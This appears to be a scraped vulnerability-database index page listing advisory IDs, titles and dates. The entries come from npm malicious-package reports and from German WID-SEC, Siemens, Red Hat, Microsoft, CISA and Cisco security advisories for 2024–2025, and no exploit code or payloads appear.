mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
ID Description Published Updated
wid-sec-w-2025-1428 sudo: Multiple vulnerabilities 2025-06-30T22:00:00.000+00:00 2025-09-29T22:00:00.000+00:00
wid-sec-w-2025-2140 GitLab: Multiple vulnerabilities 2025-09-25T22:00:00.000+00:00 2025-09-28T22:00:00.000+00:00
wid-sec-w-2025-2134 Red Hat Enterprise Linux (Developer Hub): Vulnerability allows Denial of Service 2025-09-25T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2133 Nagios Enterprises Nagios XI: Vulnerability allows execution of arbitrary program code 2025-09-25T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2117 Google Chrome / Microsoft Edge: Multiple vulnerabilities 2025-09-23T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2119 Cisco Industrial Ethernet Switches: Vulnerability allows Denial of Service 2025-09-24T22:00:00.000+00:00 2025-09-24T22:00:00.000+00:00
wid-sec-w-2025-1989 SAP Patchday September 2025: Multiple vulnerabilities 2025-09-08T22:00:00.000+00:00 2025-09-23T22:00:00.000+00:00
wid-sec-w-2025-2099 Linux Kernel: Multiple vulnerabilities 2025-09-21T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2077 Linux Kernel: Multiple vulnerabilities 2025-09-16T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2074 Mozilla Firefox, Firefox ESR and Thunderbird: Multiple vulnerabilities 2025-09-16T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2053 Linux Kernel: Multiple vulnerabilities 2025-09-15T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2051 Linux Kernel: Multiple vulnerabilities allow Denial of Service 2025-09-14T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2040 Linux Kernel: Multiple vulnerabilities allow Denial of Service 2025-09-11T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2007 Xen: Multiple vulnerabilities 2025-09-09T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1988 Linux Kernel: Multiple vulnerabilities allow Denial of Service 2025-09-07T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1987 Keycloak: Multiple vulnerabilities 2025-09-07T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1976 Linux Kernel: Multiple vulnerabilities allow Denial of Service 2025-09-04T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1961 Django (FilteredRelation): Vulnerability allows SQL injection 2025-09-03T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1933 Linux Kernel: A vulnerability allows a Denial of Service 2025-08-31T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1932 Wireshark: Vulnerability allows Denial of Service 2025-08-28T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1931 Linux Kernel: Vulnerability allows privilege escalation 2025-08-28T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1921 Linux Kernel: Vulnerability allows Denial of Service 2025-08-27T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1914 Linux Kernel: Vulnerability allows code execution 2025-08-26T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1898 Linux Kernel: Multiple vulnerabilities allow Denial of Service 2025-08-24T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1892 Keycloak: Vulnerability allows information disclosure 2025-08-21T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1869 Linux Kernel: Multiple vulnerabilities 2025-08-19T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1862 Linux Kernel: Vulnerability allows Denial of Service 2025-08-18T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1858 Linux Kernel: Multiple vulnerabilities 2025-08-17T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1830 http/2 implementations: Vulnerability allows Denial of Service 2025-08-13T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1810 Linux Kernel: Vulnerability allows Denial of Service 2025-08-12T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-916339 SSA-916339: Information Disclosure Vulnerability in Apogee PXC and Talon TC Devices 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-864900 SSA-864900: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices 2025-05-13T00:00:00Z 2025-09-09T00:00:00Z
ssa-722410 SSA-722410: Multiple Vulnerabilities in User Management Component (UMC) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-712929 SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products 2022-06-14T00:00:00Z 2025-09-09T00:00:00Z
ssa-691715 SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products 2023-04-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-640476 SSA-640476: Denial of Service Vulnerability in Industrial Edge Management 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-563922 SSA-563922: Local Privilege Escalation Vulnerability in SIMOTION Tools 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-534283 SSA-534283: Insecure File Share Vulnerability in SIMATIC Virtualization as a Service (SIVaaS) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-503939 SSA-503939: Vulnerabilities in the BIOS of the SIMATIC S7-1500 TM MFP 2025-03-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-494539 SSA-494539: Multiple Vulnerabilities in SINEC OS 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-366067 SSA-366067: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.1 on RUGGEDCOM APE1808 Devices 2024-03-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-331739 SSA-331739: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting Siemens Products 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-282044 SSA-282044: DLL Hijacking Vulnerability in Siemens Web Installer used by the Online Software Delivery 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-027652 SSA-027652: Privilege Escalation Vulnerability in SINAMICS Drives 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-707630 SSA-707630: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager Before V3.3 2025-08-12T00:00:00Z 2025-08-26T00:00:00Z
ssa-201595 SSA-201595: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting the Desigo CC Product Family and SENTRON Powermanager 2025-08-14T00:00:00Z 2025-08-19T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2025-08-18T00:00:00Z
ssa-395458 SSA-395458: Account Hijacking Vulnerability in Mendix SAML Module 2025-08-14T00:00:00Z 2025-08-14T00:00:00Z
ssa-028723 SSA-028723: Multiple OpenSSL Vulnerabilities in BFCClient Before V2.17 2025-08-12T00:00:00Z 2025-08-13T00:00:00Z
ssa-994087 SSA-994087: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.7 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-978177 SSA-978177: Vulnerability in Nozomi Guardian/CMC on RUGGEDCOM APE1808 Devices 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-908185 SSA-908185: Mirror Port Isolation Vulnerability in RUGGEDCOM ROS Devices 2023-08-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-894058 SSA-894058: Improper Bandwidth Limitation of Network Packets Over Local USB Port Vulnerability in SIPROTEC 5 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-856721 SSA-856721: Vulnerability in RUGGEDCOM Discovery Protocol (RCDP) of Industrial Communication Devices 2017-09-28T00:00:00Z 2025-08-12T00:00:00Z
ssa-840800 SSA-840800: Code Injection Vulnerability in RUGGEDCOM ROS 2022-07-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-800126 SSA-800126: Deserialization Vulnerability in Siemens Engineering Platforms before V20 2024-12-10T00:00:00Z 2025-08-12T00:00:00Z
ssa-794185 SSA-794185: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SIPROTEC, SICAM and Related Products 2025-05-13T00:00:00Z 2025-08-12T00:00:00Z
ssa-787941 SSA-787941: Denial of Service Vulnerability in RUGGEDCOM ROS devices 2022-11-08T00:00:00Z 2025-08-12T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2025:6966 Red Hat Security Advisory: kernel security update 2025-05-13T08:28:50+00:00 2025-09-30T17:58:13+00:00
rhsa-2025:9646 Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.3.7 security and bug fix update 2025-06-25T14:06:29+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9541 Red Hat Security Advisory: Submariner 0.17.6 bug fixes and container updates 2025-06-24T14:31:21+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9388 Red Hat Security Advisory: Red Hat Multicluster GlobalHub 1.2.3 bug fixes and container updates 2025-06-23T15:10:48+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:8510 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.7 security and bug fix update 2025-06-04T12:26:00+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9259 Red Hat Security Advisory: OpenShift Container Platform 4.15.53 bug fix and security update 2025-06-26T01:50:03+00:00 2025-09-30T17:12:59+00:00
rhsa-2025:9167 Red Hat Security Advisory: Red Hat build of OpenTelemetry 3.6.0 release 2025-06-17T09:27:34+00:00 2025-09-30T17:12:59+00:00
rhsa-2025:8691 Red Hat Security Advisory: RHSA: Submariner 0.20.1 - bug fix and enhancement update 2025-06-09T14:26:17+00:00 2025-09-30T17:12:58+00:00
rhsa-2025:8560 Red Hat Security Advisory: OpenShift Container Platform 4.18.17 bug fix and security update 2025-06-10T06:26:36+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8556 Red Hat Security Advisory: OpenShift Container Platform 4.16.42 bug fix and security update 2025-06-13T05:16:43+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8552 Red Hat Security Advisory: OpenShift Container Platform 4.17.33 bug fix and security update 2025-06-11T12:02:51+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8544 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.15.14 Bug Fix Update 2025-06-04T20:11:19+00:00 2025-09-30T17:12:56+00:00
rhsa-2025:8542 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.13.3 fixes and container updates 2025-06-04T21:17:49+00:00 2025-09-30T17:12:56+00:00
rhsa-2025:8479 Red Hat Security Advisory: RHODF-4.16-RHEL-9 security update 2025-06-04T01:58:44+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8392 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.9.9 bug fixes and container updates 2025-06-04T00:41:53+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8390 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.4.9 security updates and bug fixes 2025-06-02T17:37:18+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8384 Red Hat Security Advisory: Red Hat multicluster global hub 1.4.1 bug fixes and container updates 2025-06-02T14:56:45+00:00 2025-09-30T17:12:54+00:00
rhsa-2025:8274 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.14.4 security update 2025-05-28T20:39:49+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8267 Red Hat Security Advisory: osbuild-composer security update 2025-05-28T15:24:18+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8244 Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.21.0 release 2025-05-28T02:39:39+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8075 Red Hat Security Advisory: osbuild-composer security update 2025-05-21T15:37:30+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:8059 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.7 Bug Fix Update 2025-05-21T06:13:16+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7967 Red Hat Security Advisory: osbuild-composer security update 2025-05-19T09:52:50+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7753 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.15.2 security update 2025-05-15T17:09:32+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7702 Red Hat Security Advisory: OpenShift Container Platform 4.14.52 bug fix and security update 2025-05-21T14:54:27+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7503 Red Hat Security Advisory: osbuild-composer security update 2025-05-13T17:31:03+00:00 2025-09-30T17:12:51+00:00
rhsa-2025:7479 Red Hat Security Advisory: opentelemetry-collector security update 2025-05-13T17:18:27+00:00 2025-09-30T17:12:51+00:00
rhsa-2025:7475 Red Hat Security Advisory: grafana security update 2025-05-13T16:00:56+00:00 2025-09-30T17:12:50+00:00
rhsa-2025:7425 Red Hat Security Advisory: osbuild-composer security update 2025-05-13T13:57:39+00:00 2025-09-30T17:12:49+00:00
rhsa-2025:7407 Red Hat Security Advisory: opentelemetry-collector security update 2025-05-13T13:53:53+00:00 2025-09-30T17:12:49+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-59251 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-25T07:00:00.000Z
msrc_cve-2025-55232 Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-25T07:00:00.000Z
msrc_cve-2025-55322 OmniParser Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-24T07:00:00.000Z
msrc_cve-2025-59220 Windows Bluetooth Service Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59216 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59215 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-55241 Azure Entra ID Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-50154 Microsoft Windows File Explorer Spoofing Vulnerability 2025-08-12T07:00:00.000Z 2025-09-17T07:00:00.000Z
msrc_cve-2025-54910 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54906 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54905 Microsoft Word Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54904 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54903 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54902 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54901 Microsoft Excel Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54900 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54899 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54898 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54896 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-49728 Microsoft PC Manager Security Feature Bypass Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-47967 Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-55319 Agentic AI and Visual Studio Code Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-12T07:00:00.000Z
msrc_cve-2025-49734 PowerShell Direct Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-11T07:00:00.000Z
msrc_cve-2025-55317 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55316 Azure Connected Machine Agent Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55245 Xbox Gaming Services Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55243 Microsoft OfficePlus Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55236 Graphics Kernel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55234 Windows SMB Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55228 Windows Graphics Component Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
va-25-272-01 Medical Informatics Engineering Enterprise Health multiple vulnerabilities 2025-09-29T00:00:00Z 2025-09-29T00:00:00Z
icsa-25-268-01 Dingtian DT-R002 2025-09-25T06:00:00.000000Z 2025-09-25T06:00:00.000000Z
icsa-25-266-04 Viessmann Vitogate 300 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
icsa-25-266-02 Mitsubishi Electric MELSEC-Q Series CPU Module 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
icsa-25-266-01 AutomationDirect CLICK PLUS 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
va-25-265-01 Airship AI MFA bypass and default credentials vulnerabilities 2025-09-22T14:06:13Z 2025-09-22T14:06:13Z
icsa-25-261-07 Dover Fueling Solutions ProGauge MagLink LX4 Devices 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-06 Cognex In-Sight Explorer and In-Sight Camera Firmware 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-03 Schneider Electric Saitel DR & Saitel DP Remote Terminal Unit 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-02 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-01 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-254-10 Daikin Europe N.V Security Gateway 2025-09-11T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol (Update C) 2025-07-10T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update D) 2024-01-30T07:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-259-07 Delta Electronics DIALink 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-05 Siemens OpenSSL Vulnerability in Industrial Products 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-03 Siemens SIMATIC NET CP, SINEMA and SCALANCE 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-02 Hitachi Energy RTU500 series 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
va-25-259-01 CISA Thorium multiple vulnerabilities 2025-09-16T00:00:00Z 2025-09-16T00:00:00Z
va-25-258-01 psPAS does not enforce TLS 1.2 within Get-PASSAMLResponse 2025-09-15T18:41:08Z 2025-09-15T18:41:08Z
va-25-174-01 OPEXUS FOIAXpress Public Access Link (PAL) multiple vulnerabilities 2025-07-31T17:01:09Z 2025-09-09T21:12:34Z
va-25-252-01 OPEXUS FOIAXpress Public Access Link (PAL) SQL injection 2025-09-09T20:48:26Z 2025-09-09T20:48:26Z
icsa-25-093-01 Hitachi Energy RTU500 Series (Update B) 2025-03-25T12:30:00.000000Z 2025-09-09T12:30:00.000000Z
icsa-25-023-02 Hitachi Energy RTU500 Series Product (Update A) 2024-04-30T12:30:00.000000Z 2025-09-09T10:00:00.000000Z
icsa-25-252-09 Rockwell Automation 1783-NATR 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-08 Rockwell Automation Analytics LogixAI 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-07 Rockwell Automation ControlLogix 5580 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-06 Rockwell Automation CompactLogix® 5480 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-05 Rockwell Automation FactoryTalk Activation Manager 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-04 Rockwell Automation FactoryTalk Optix 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-snmp-x4lphte Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability 2025-09-24T16:00:00+00:00 2025-09-30T16:15:10+00:00
cisco-sa-cat9k-ptmd7bgy Cisco IOS XE Software for Catalyst 9000 Series Switches Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-30T14:26:46+00:00
cisco-sa-asaftd-webvpn-yrootuw Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Unauthorized Access Vulnerability 2025-09-25T16:00:00+00:00 2025-09-26T16:35:51+00:00
cisco-sa-ap-ipv6-gw-tuazpn9o Cisco Access Point Software Intermittent IPv6 Gateway Change Vulnerability 2025-09-24T16:00:00+00:00 2025-09-26T16:35:51+00:00
cisco-sa-webui-xss-vwydgjou Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability 2025-09-24T16:00:00+00:00 2025-09-26T16:35:50+00:00
cisco-sa-http-code-exec-wmfp3h3o Cisco Secure Firewall Adaptive Security Appliance Software, Secure Firewall Threat Defense Software, IOS Software, IOS XE Software, and IOS XR Software Web Services Remote Code Execution Vulnerability 2025-09-25T16:00:00+00:00 2025-09-25T16:00:00+00:00
cisco-sa-asaftd-webvpn-z5xp8eub Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Remote Code Execution Vulnerability 2025-09-25T16:00:00+00:00 2025-09-25T16:00:00+00:00
cisco-sa-snmpwred-x3mjyf5m Cisco IOS XE Software Simple Network Management Protocol Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-secboot-uqfd8avc Cisco IOS XE Software Secure Boot Bypass Vulnerabilities 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-nbar-dos-lavwtmet Cisco IOS XE Software Network-Based Application Recognition Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-iosxe-arg-inject-eyddbh4e Cisco IOS XE Software CLI Argument Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-xe-cmd-inject-rpjm8bgl Cisco IOS XE Software HTTP API Command Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-tacacs-hdb7thjw Cisco IOS and IOS XE Software TACACS+ Authentication Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-invalid-url-dos-nvxszf6u Cisco IOS Software Industrial Ethernet Switch Device Manager Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-cli-eb7cz6yo Cisco IOS and IOS XE Software CLI Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-defaultacl-psjk9nvf Cisco SD-WAN vEdge Software Access Control List Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-cat9k-acl-l4k7vxgd Cisco IOS XE Software on Cisco Catalyst 9500X and 9600X Series Switches Virtual Interface Access Control List Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-action-frame-inj-qqcncz8h Cisco Wireless Access Point Software Device Analytics Action Frame Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-9800cl-openscep-sb4xtxzp Cisco IOS XE Software for Catalyst 9800 Series Wireless Controller for Cloud Unauthenticated Access to Certificate Enrollment Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-snmp-bypass-hhuvujdn Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-09-22T14:12:28+00:00
cisco-sa-xrsig-uy4zrucg Cisco IOS XR Software Image Verification Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-iosxr-arp-storm-ejuu55ym Cisco IOS XR ARP Broadcast Storm Denial of Service Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-acl-packetio-swjhhbtz Cisco IOS XR Software Management Interface ACL Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-fp2k-ipsec-dos-tjwgdzco Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software for Firepower 2100 Series IPv6 over IPsec Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-09-09T21:22:34+00:00
cisco-sa-webex-xss-55bv8hhm Cisco Webex Meetings Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-webex-urlredirect-uk8ddjsz Cisco Webex Meetings URL Redirection Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-phone-write-g3kcc5df Cisco Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 with SIP Software Vulnerabilities 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-imp-xss-xqgu4hsg Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-pi-stored-xss-xjqzsycp Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Stored Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-info-dis-zhppmfgz Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Information Disclosure Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
